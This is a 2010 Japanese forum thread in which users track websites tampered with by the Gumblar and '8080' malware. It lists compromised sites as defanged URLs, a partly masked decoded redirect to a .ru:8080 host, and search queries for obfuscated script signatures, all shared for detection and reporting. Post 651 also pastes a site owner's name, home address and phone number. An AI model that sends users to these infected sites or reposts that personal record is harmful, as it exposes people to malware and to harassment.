510 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 23:23:33 ]: 普通に考えてIPなんか晒されたくないよ
なんで「連絡をくれた方々」じゃいけんかったんじゃ
511 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 23:24:22 ]: なんだこいつ
IPフェチか
512 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 23:25:56 ]: (　´,_ゝ`) ﾌﾟｯ
513 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 23:28:19 ]: ウイルスに感染してメールが来て2chにお礼をしにきたら煽り入れられて･･･踏んだり蹴ったりですね
同情します
514 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 23:31:18 ]: >>507,508
IP全部じゃなくて一部隠してる理由は何？
全部晒すのは良くないと思ってるからじゃないの？
よくわからないのなら全部晒せばいいだろうに

それらのIPが外部の者だとすぐにわかるってことは相当身内のみなんだろうな
>>492以前のログが身内しかなければ身内による通報だってことだよ
直前にアクセスした人とは限らないが
515 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 23:32:57 ]: >>507
氏ねカス
516 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 23:36:43 ]: >>507
ttp://www.google.co.jp/search?hl=ja&source=hp&q=%E5%B9%B3%E6%B2%A2%E5%94%AF&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=&rlz=1W1ADBR_ja&aq=f&oq=
517 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 23:40:58 ]: >>507
分からないふりして恫喝しに来たんだろう。モロバレ。
518 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 23:42:37 ]: >>507
どう見ても私のIPはいってます。本当にありがとうございました。

wgetしてるから危険も何もないんですけどねｗｗｗ
519 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 23:44:43 ]: >>507
親切で教えたのに何その態度
その身内全員ウィルスに感染してるかもしれないのでチェック忘れずに
520 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 23:48:54 ]: >>一つだけ質問があるのですが、>>492様はどちらでこのページを見つけたのですか？

これが言いたかったわけね……
521 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 23:51:00 ]: それよりもどんなウイルスを食らってるか心配したほうがいいと思う管理者も閲覧者も
522 名前：名無しさん＠お腹いっぱい。 [2010/02/14(日) 23:53:28 ]: >>507
IPアドレス晒すなksg
キチガイ乙
523 名前：507 mailto:sage [2010/02/14(日) 23:55:26 ]: ええと…
本当にごめんなさい。

今、兄に代筆してもらい削除依頼をしてもらいました。
それとここに通報した人は兄でした。　
ブックマークの中からみつけたそうです。

ごめんなさい。
524 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 23:55:33 ]: >>507
1.tet
www.virustotal.com/jp/analisis/1596c1d384a88d1c1d225f69c9da3d02322881c60b6bc08bd20e294c5b33d0cd-1266144186
2.tet
www.virustotal.com/jp/analisis/38618fbcf2bb9896201c452070f24f091966f1d64e70661b19196fff5ce015cd-1266144320
3.txt
www.virustotal.com/jp/analisis/c816207a6046c8d4c28e896f10e4f17f2708ccfc6aaa555fda5eae508badc8f0-1266144387
525 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 23:56:00 ]: 感染したサイトのURLをリンク化させるなって人は
とりあえず、Jane系のブラウザ使ってる人限定だけど

<ex>.[tab]●[tab]msg[tab]<0>Web改竄ウイルス総合スレ

[tab]はキーボードのタブキーを押してタブ文字を入れて
これをReplaceStr.txtに追加してくれ
そうすると、レス本文の中にあるコロンの文字が置換される

StyleとNida向けにはスレのタイトルに”Web改竄ウイルス総合スレ”が含まれていると置換対象になる
Viewだと置換対象のスレッドを特定することが難しいだろうから、他のスレに誤爆する可能性大
後、危険のない安全なサイトのURLにも誤爆するから、導入する人はそれを覚悟で頼む
526 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 00:09:51 ]: >>525
公共のために言ってるんだからそういうことじゃないだろ
527 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 00:23:42 ]: >>525
何を言ってるんだね？
528 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 00:25:27 ]: >>525
冒頭2行からしておかしいけど
・・・全てが狂ってる
529 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 00:49:27 ]: >>525
対症療法としてはありだが、リンク自体を殺せと言ってるに等しい。
530 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 01:19:55 ]: >>523
削除依頼をしても消されません。
発信者情報は削除要請では投稿した時に一部の人を除いて強制表示される仕組みです。

マナーの問題として善意でメールした人のアドレスを晒すのどうかとは思います。
531 名前：名無しさん＠お腹いっぱい。 [2010/02/15(月) 01:21:47 ]: >>530
IPアドレスを晒しちゃ駄目なの？
全く問題無いだろ
532 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 01:29:12 ]: 全くってことはない
533 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 01:43:21 ]: >>531
強制開示している掲示板もあります。しかし、それは投稿者が承知して書き込む前提です。
嫌なら書かなければ良いです。駄目とかでは無く530で言うようにマナーの問題です。
534 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 02:32:48 ]: 専ブラの場合、適当なテキストブラウザ入れてそのブラウザで開くようパスを指定すればいいんじゃないか。
テキストブラウザの設定もソースで開くにすれば即調査できる。
535 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 05:54:35 ]: 検索回避なんて
紳士協定ですからー
536 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 07:26:31 ]: 本気で回避したけりゃ
認証入れろってことだわな
537 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 08:16:29 ]: まー認証入れてたら、入れる中から指摘するやつが現れないと発覚しないからな
気づいたときには全員感染済みとか有り得る
538 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 12:40:52 ]: >>534
ルールを守れないアフォは来なくていいから
539 名前：名無しさん＠お腹いっぱい。 [2010/02/15(月) 12:46:17 ]: >>470
>>471
外部からの指摘メールは余計な作業を増やす原因
と思っている方が多いようです。

返事やお礼なんか一切ないです。

・・・訂正　少し反応ありました。
「あんたのパソコンこわれてるんじゃないの？」
「外注先にまかせてるのでわかりません」
など
甚だしいのは
「みつけたんならなおしといて」
（T_T)
540 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 12:56:31 ]: めるぽ人乙すぐる；；
541 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 13:01:31 ]: >>539
聞く耳持たないクソ企業が損害受けるだけならザマーなんだけど
これはそうじゃないのがつらいとこだね。。
542 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 13:05:13 ]: >>539
あんたのパソコンこわれているんじゃないのじゃねえよなｗ
あんたのサイトがみんなのパソコン壊してんのに。
543 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 13:08:21 ]: 鯖缶って馬鹿でも出来る職業なの
544 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 13:22:29 ]: 前スレだか前々スレに来てた鯖缶を見る限りはそうなんだろうなｗ
545 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 13:23:11 ]: >>543
サーバ管理者は関係ないだろ
546 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 13:24:21 ]: うん
547 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 13:26:00 ]: >>544
何それ気になるから貼って
548 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 13:27:08 ]: 相変わらずfile.exe 実行中に落ちるだけで感染せず・・・orz
もうまんどくさくなってきたｗ
549 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 13:31:38 ]: そういやSEOに関するHPもちょこちょこやられてるな。
SEO業者って案外PCに関する知識無いからな・・・

SEO業者って　すごくきけん！！
550 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 13:33:51 ]: ttp://emoto-shokai●sakura●ne●jp/
既出？
551 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 13:43:00 ]: >>550
氏ね
552 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 14:02:42 ]: SEO業者ってページ作ったらほったらかしなんじゃないの
553 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 15:37:47 ]: >>551
なんで>>550が氏ねって言われないといけないんだよ
ドットは●に変換されてるぞ?まさか「-」まで●にしろとか基地外発言するんじゃないだろうな?

所で誰か法政大社会学部公式サイトの改ざんの連絡した奴いる?
554 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 15:56:01 ]: >>547
探して貼るの面倒だが流れとしては
経費削減でパソコンに詳しいと思われて無理矢理サーバ管理者にされた聞くも涙な話があった。
555 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 15:56:23 ]: と思ったらページ消されてた
>>449該当ページの削除を確認
556 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 16:13:32 ]: >>553
ttpが残ってると専ブラとかだとリンクになるからじゃないかな？
557 名前：へたれ発掘屋 mailto:sage [2010/02/15(月) 16:19:11 ]: 【8080系】
tp://www●midori-gourmet●com/mise/267_goose/index●html ←3発
tp://www●ananya●jp/index●html ←ぉ？
海外(検体取得に...)
tp://jaguarracing●xf●cz/xmlrpc●php
tp://mogulclub●com/BANDS_AND_GIGS/index_CIARA●html

崩壊サイトが多くなってきたー

【Gumblar】
tp://www●kiyasuisan●co●jp/
tp://www●tailor●co●jp/hs●html
558 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 16:19:28 ]: だから専ブラで誤ってクリックしても大丈夫なように>>534の様な対策とれってことだな。
いくら言ってもドットは●に変換しない人が出てくるわけで。
559 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 16:39:28 ]: www●luna-ashiya●jp/rental-studio/index●html
www●scc●u-tokai●ac●jp/club/tennis/index●htm

前スレみれないから既出かどうか確認出来てませんが。
このスレも確認しましたけど見落としてるかも・・・
560 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 16:41:28 ]: www だけでええやろ

俺が許すから
561 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 16:43:34 ]: ＊＊＊危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください＊＊＊
＊＊＊ http://は不要。 www　からどうぞ。　俺が許すから＊＊＊
＊＊＊感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します＊＊＊
562 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 17:00:07 ]: >>556
tpだけでもjaneはリンクにしてくれる

まあうっかり踏む奴も問題
563 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 17:10:55 ]: >>417と>>496
封鎖確認

ところで、いつまで待っても対応しない奴ってIPAにも通報するべきか
意味ない？
564 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 17:13:02 ]: >>563
鯖屋に連絡が1番だと思うが。
565 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 17:16:23 ]: >563
まぴょーん
566 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 17:18:44 ]: 基本的にはサイト作成者ではなく鯖管理者に連絡してるわ
作成者に連絡してもほっとんど意味がない

あとはこのへんとか
https://www.jpcert.or.jp/pr/2010/pr100001.txt
567 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 17:36:59 ]: 対策済URL(●付き)にガタガタ文句を言う腰抜けは

こ　の　ス　レ　に　来　る　な　！
568 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 17:42:27 ]: >>557の8080系の2番目
復号する場所が変だったので修正しました。
gumblar.s1.dynamitelife.net/ver3/
569 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 18:20:32 ]: tp://hoso●it-bunka●com/shinkansen/
DEBUG改
570 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 18:23:24 ]: ・このスレを見る
・うっかり踏む
・脆弱性を残したまま
・セキュリティーがうんこ

これだけのバカしなければ被害も出ない。
571 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 18:44:46 ]: >>570
VBってどう？うんこ？
572 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 18:54:17 ]: 素でVisualBasicかと思っｔ

宣伝力は業界1・2を争うくらいだと思うがセキュリティソフトとしては並くらい？
573 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 19:02:42 ]: >>571
VeryBaka
574 名前：名無しさん＠お腹いっぱい。 [2010/02/15(月) 19:06:10 ]: VisualBasicの略だと思った俺死亡

自分で集めた検体を食わしたが...全く検出出来なかった
VeryBaka
575 名前：名無しさん＠お腹いっぱい。 [2010/02/15(月) 19:13:08 ]: マスターペニス
576 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 19:34:13 ]: 　:::::::::::/　　　　　　　　　　ヽ::::::::::::
　:::::::::::|　　糞　　な　　ガ　　i::::::::::::
　:::::::::::.ゝ　だ　ん　ン　ﾉ:::::::::::
　:::::::::::/　よ　　て　　ブ　ｲ:::::::::::::
　:::::　 |　　　。　　　　ラ　ﾞi　　::::::
　　　　＼_ 　　　　　｜ ,,-'
　――--､..,ヽ__　　＿,,-''
　:::::::,-‐､,‐､ヽ.　)ノ　　　　　＿,,...-
　:::::_|/ ｡|｡ヽ|-i､　　　　　 ∠＿:::::::::
　／. ` ' ● '　ﾆ､　　　　 ,-､ヽ|:::::::::
　ニ　＿_ｌ＿_＿ノ　　　　 |・ |　|, -､::
　/￣　＿　　| i　　　　　ﾟr ｰ'　　6 |::
　|(￣`'　　）/ /　,..　　　 i　　　　　'-
　`ー---―' / '（__ ）　　　ヽ、
　====（ i）==::::／　　　　　　,/ﾆニニ
　:/ 　　　ヽ:::i　　　　　　　/;;;;;;;;;;;;;;;;
577 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 20:03:12 ]: >>572-574
㌧、よくわかった。
次の更新の時avastに乗り換えるわ。
半年くらい先だけど。
578 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 20:14:08 ]: バスター(笑)使ってるけど問題ないけどなー。
まー何のソフト使ってるかが問題っていうより意識の問題が重要かと
579 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 20:45:20 ]: まったく検出しないからサクサク軽快です
580 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 20:46:56 ]: panda使おうpanda
581 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 20:49:30 ]: >>577
どれが大丈夫ってのは無いからよくわからないならそのまま同じのを使っていた方が無難
周りに流されていちいち対策ソフトを変えることに大きな意味はないし
素人が使い慣れないセキュリティ対策ソフトを使うことはマイナス要因にもなり得る
さらに無料製品は自分でなんとかできない人にはおすすめしない

結局は>>578のように各ソフトウェアの更新とかそういう対策が重要なだけだ
582 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 20:51:03 ]: 無料製品は自分でなんとかできない人にはおすすめしないって書いてるけど
なんとかできないようなことってあるかな？
583 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 20:52:12 ]: 自分でなんとかするって何をなんとかするんだ
584 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 20:52:57 ]: ケッコウ有る
日本語で電話のサポート受けられるのとは違うから
585 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 20:56:55 ]: >>582
人によっては、何もしてないのこ壊れたふじこふじこ
という電話で出張サポートがきてくれるらしいぞ orz
586 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 22:00:31 ]: サポート窓口がある会社の製品使ってるのに、
なぜか俺のところに問い合わせが来る件。
587 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 22:02:49 ]: >>581
ウイルスバスター先生の実力を見よ！！
ttp://www.smilebanana.com/archives/2010/01/10-2356.php
588 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 22:03:47 ]: バスターさんはWinnyグループの一員だしなぁ
589 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 22:12:59 ]: 何でもかんでも先生つけるなよ
先生はノートンくらいだろ
590 名前：名無しさん＠お腹いっぱい。 [2010/02/15(月) 22:15:31 ]: Google製のアンチウイルスはリリースされないのか？
検索サービスからウェブアルバム・IME・動画共有までなんでもござれのGoogleならやりかねん
591 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 22:26:32 ]: Googleは基本的にWebサービスありきだからなあ
クラウド型ならありなのかな
そのへん買収か
592 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 22:44:03 ]: .rmや.movを再生したいのに本家のプレイヤーだとGumblar感染の危険があるのがねえ

QuickTime,Real Alternativeでも全てのrm、movを再生出来るようじゃなさそうだし・・・
ttp://www.katch.ne.jp/~kakonacl/douga/winplayer/winplayer2.html
593 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 22:54:36 ]: movって拡張子のファイルは分からないけど
rmって拡張子のファイルだとMedia Player Classicってやつで再生出来るかもよ?
594 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 22:56:04 ]: チェッカーは携帯に対応してませんか？
595 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 22:59:28 ]: 携帯には感染しないと思います
596 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 23:02:46 ]: 誰か携帯でｱｸｾｽしてみてよ
どうなるの？
597 名前：名無しさん＠お腹いっぱい。 [2010/02/15(月) 23:04:38 ]: JavaScriptが動かないだろ
フルブラウザはわからんが
598 名前：名無しさん＠お腹いっぱい。 [2010/02/15(月) 23:05:13 ]: >>596
残念ながらガラゲーには未対応ｗｗ
599 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 23:11:29 ]: ガラゲー？
600 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 23:12:27 ]: PCサイトビューアならJavaScript働いて.ruに飛ばされて…まぁどうせエラーとかだろ
601 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 23:12:31 ]: JavaもないしAdobe Readerもないし、ましてやWindowsでもないから、転送されて文字表示されて終わり
逆に言えば感染専用機がなくてもケータイで感染してるか否かくらいは判別可能
602 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 23:15:58 ]: www●lcd-repair●biz/pref/
このタイプ新型かな
603 名前：名無しさん＠お腹いっぱい。 [2010/02/15(月) 23:17:05 ]: >>599
ガラパゴス携帯
604 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 23:18:15 ]: ガラパゴスゲータイ！！！
605 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 23:35:01 ]: ガラバゴズゲーダイ！
606 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 23:41:45 ]: >>602
飛ばされる先のURLにnicovideo.jpとか入っててﾜﾛﾀ
607 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/15(月) 23:59:02 ]: >>606
とうとうニコ動までやられたってことか？
608 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 00:00:36 ]: >>606
ウイルス作者に認識されるようなサイトだったのかｗｗｗ
609 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 00:28:24 ]: >>606
全然詳しくないんだけど、以前楽天がやって問題になった
"ad4Uの隠しリンク"ってやつ？
610 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 00:39:10 ]: >>594
ttp://fileseek.net/
「＊ボタン(メニュー)」からソースが見れるしチェッカーも使える。
611 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 01:01:10 ]: >>607, 609

//****.ru:8080/google.com/google.com/nicovideo.jp/torrentdownloads.net/fox.com/

デコード結果。
612 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 01:02:10 ]: 前もnikkansports.comとか入ってたこともあったな
まぁこれで日本人がウィルスの作者だと決めるのは間違ってるだろうが
613 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 03:16:10 ]: hekiru1985●fc2web●com/
614 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 03:23:43 ]: >>613
どこが感染してるのか俺にはわからんのだが
615 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 03:28:16 ]: >>613
宣伝乙
616 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 03:30:14 ]: Backlinks,
617 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 03:31:24 ]: Norton Safe Web has analyzed hekiru1985●fc2web●com for safety and security problems. Below is a sample of the threats that were found.
618 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 04:06:20 ]: >>615
日本語わかる？
619 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 04:23:45 ]: fc2はブログとかでロック登録されているけどだからってこれを宣伝とは！ｗ
620 名前：名無しさん＠お腹いっぱい。 [2010/02/16(火) 09:33:56 ]: マスターペニス
621 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 10:11:25 ]: >>539
ﾜﾛﾀ
622 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 10:56:39 ]: >>539
（´・ω・｀）「Gumularで改竄されてるよ」
（ﾟ　д　ﾟ）「あんたのパソコンこわれてるんじゃないの？」

ワロタｗ
どこのお母さんだよ。
623 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 11:12:50 ]: 不埒なサイトはGoogleのブラックリスト行きにしたい
624 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 12:40:04 ]: Adobe Readerバージョンアップまだぁ
おせーぞゴラァ氏ね糞adobe
625 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 12:44:57 ]: >>624
今夜～明日ぐらいにパッチが出るんだってよ
AdobeもMSも寡占状態でやる気ねーんだろうなｗ
626 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 12:46:17 ]: >>624
ヒント：米国で16日
627 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 12:58:08 ]: 脆弱性のあるバージョンのAdobe Readerをダウンロード出来るようにしている
注意やとりあえずの回避方法もダウンロードページに示していない
企業としてこれはダメだろ
628 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 13:01:42 ]: >>625
ほんとに怒りで足が震えてくる。adobeだけはぶっ潰さないと俺の気が静まらない。
あのMSでさえ、セキュリティホールがあれば下手に出てきて対応してるのに、
なんじゃこの企業は。
この際、もう好きにしてていいから、これ以上企業買収するな。毒をばら撒くな。
629 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 13:56:13 ]: ウィルス作成者の狙いは怒りをアドビに向けさせることだったんだよ！
630 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 14:03:20 ]: もしそうならウイルス作者応援してもいいｗ
631 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 14:34:41 ]: そしてとばっちりを受けるマカフィー（インスコ時に無料スキャンが付いてくる関係で
632 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 14:40:44 ]: うちの父親がガブラーで覚えてしまってて困る
633 名前：名無しさん＠お腹いっぱい。 [2010/02/16(火) 14:46:49 ]: >>618
うるせぇksg
634 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 15:37:18 ]: >>631
え。あれはJwordとかaskツールバーと同じでチェックを外すのもインスコ作業のうちだろう
635 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 16:29:00 ]: quake_vnb●rshu●ru/index_eng●html
再々再発
いい加減これはどうにかしないといかんざき
636 名前：へたれ発掘屋 mailto:sage [2010/02/16(火) 17:00:31 ]: tpいらねとか書いてあったような気がしたから//～にしておく
--
「不動産　久地｜大生不動産」
//www●taisei-fudousan●co●jp/index●html
//www●taisei-fudousan●co●jp/js/smartRollover●js
//www●taisei-fudousan●co●jp/js/head●js
チェッカーは３無反応、チェッカー２は一部コードに反応(スルー有)
637 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 17:03:12 ]: >>602
朝に対応しました。

>>635
対応しました。

gumblar.s1.dynamitelife.net/ver3/
638 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 17:06:26 ]: ウイルス作ったり、最初にばらまくのって一人でやってるの？
639 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 17:08:14 ]: >>637
8080系ドメインリスト確認機能が一部のページをチェックする際に動作しなくなっていたので修正しました。
640 名前：へたれ発掘屋 mailto:sage [2010/02/16(火) 17:11:45 ]: チェッカー２＆３がスルーするようになってしまた(危)
//www●hervochapiteaux●be

国内・海外関係無く、最新型の陥落サイト掘ってくる
641 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 17:15:07 ]: >>636,640
順番に対応していきます。
642 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 17:19:53 ]: >>636,640
（636はとりあえず//www●taisei-fudousan●co●jp/index●htmlのみ）
対応しました。
643 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 17:24:36 ]: 640の複号がちょっとおかしいっぽいです。修正するので少々お待ちください。
644 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 17:32:50 ]: Gumblar 亜種に続く、Pegel 対策に関する留意点
www.kaspersky.co.jp/news?id=207578803
645 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 17:36:46 ]: >>643
修正しました。
646 名前：へたれ発掘屋 mailto:sage [2010/02/16(火) 17:51:26 ]: っミ

//www●midori-gourmet●com/mise/316_tresette
※www●midori-gourmet●com/mise/を消滅させないと･･

//www2●odn●ne●jp/2711726/style/index●html
//ten-company●com/04office/index●html ←新旧混在
//nakahara-seitai●com ←最新型じゃないけど･･

発掘中に遭遇した素晴ら(ry
＊＊＊危険・アクセス注意＊＊＊
usuarios●multimania●es/robney/main/baladas●php
・<script>functionが大量装填中
・1390行目の<script>dLkpShsWFt= ～ fMDB="fMDB";</script>
・1411行目に
647 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 18:09:18 ]: >>638
最近のはビジネス目的なんで集団でやってるとこが多いみたいです
648 名前：へたれ発掘屋 mailto:sage [2010/02/16(火) 18:21:13 ]: ぁぅ･･･orz

【ぐーくる先生】
ttp://www.google.co.jp/search?hl=ja&source=hp&q=%22var%22+%22if%28%22+%22%3Bvar%22+%22.replace%28%22+%22this
.%22+%22window%22+%22window%3Bvar%22+%22%3Bdocument%22+%22false%3Bvar%22+%22new+String%28%22+%22%3B%7D+catch%28%22&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=
※陥落サイトは絶賛スルー中？

【びんぐ】
ttp://www.bing.com/search?q=%22var%22+%22if%28%22+%22%3Bvar%22+%22.replace%28%22+%22this.%22+%22window%22+%22
window%3Bvar%22+%22%3Bdocument%22+%22false%3Bvar%22+%22new+String%28%22+%22%3B%7D+catch%28%22&go=&form=QBRE3

↑
長すぎる行があるぞぼけって叱られたから、適当なとこで改行してまつ

--
関西の医療専門学校情報.net（大阪府）
//kansai●stylen●net/
8080は相変わらず絶賛進化中らしい･･･
649 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 18:30:48 ]: >>640

8080についてはこっちのチェッカーも検出率高いよ
ec2-204-236-148-61.us-west-1.compute.amazonaws.com/
650 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 18:41:50 ]: アドレス怪しいのなんとかならんのか
651 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 19:43:23 ]: >>648
凸完了
閉鎖して二度とnetに係わらないらしい
この人変w
「stylen.net」の検索結果
owner-contact: P-SEA182
owner-organization: Personal
owner-title: None
owner-fname: Shinji
owner-lname: Aoki
owner-street: Kameari 5-19-12 None
owner-city: Katusikaku
owner-state: Tokyo
owner-zip: 125-0061
owner-country: JP
owner-phone: 03-3606-1083
652 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 19:46:16 ]: あー…
653 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 19:50:19 ]: ん？
654 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 19:51:10 ]: あーあ
655 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 19:51:46 ]: >>651
お前・・・凸報告は良いがその下の検索結果はいらんだろ
削除依頼だせ
656 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 19:52:41 ]: ん？どういうこと
657 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 19:54:04 ]: うぼぁ・・・踏んでしまった・・・orz
アバストが気味悪いファンファン鳴るサイレンとともにトロイを検知したんだが・・・
下にはオンラインスキャナが何か見つけたって書いてた
